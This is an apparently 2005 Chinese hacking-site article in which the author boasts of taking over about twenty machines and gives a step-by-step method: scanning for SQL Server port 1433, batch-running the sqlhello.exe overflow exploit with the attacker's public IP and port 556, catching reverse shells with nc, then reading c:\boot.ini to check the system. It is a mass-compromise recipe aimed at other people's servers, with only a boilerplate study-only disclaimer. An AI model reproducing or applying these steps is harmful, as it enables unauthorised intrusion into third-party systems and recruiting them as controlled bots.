欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

SQL溢出新方法!!肉鸡不用愁!!

来源:未知 作者:nirvana 时间:2005-03-05 TAG: 我要投稿

我今天用这个方法拿到了近20台肉鸡。呵!!

要用到几个工具!!

nc.exe

sqlhello.exe

代理猎手!!

先用代理猎手扫1433端口!这个大家应该会吧。。玩QB的时候可以说是。。。呵。。

扫到后整理。。 导出。 替换为溢出的格式!!比如我扫到了。。

192.168.0.1:1433

溢出的格式就是: sqlhello.exe 192.168.0.1 1433 本机IP(公网的) 556

保存为bat文件。。

先在公网的机子上监听一个端口 如556

现在运行那个bat文件!

呵!!看着有没有shell返回。

我试过不到两分钟就返回了一个。。

这时候你先ctrl+c 停下那个bat 的运行。。

查看一下。那个shell的系统再说!

type c:\boot.ini

如果是2003服务器版的。

呵。。

很快的就成为我们的肉鸡了!!

 
【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载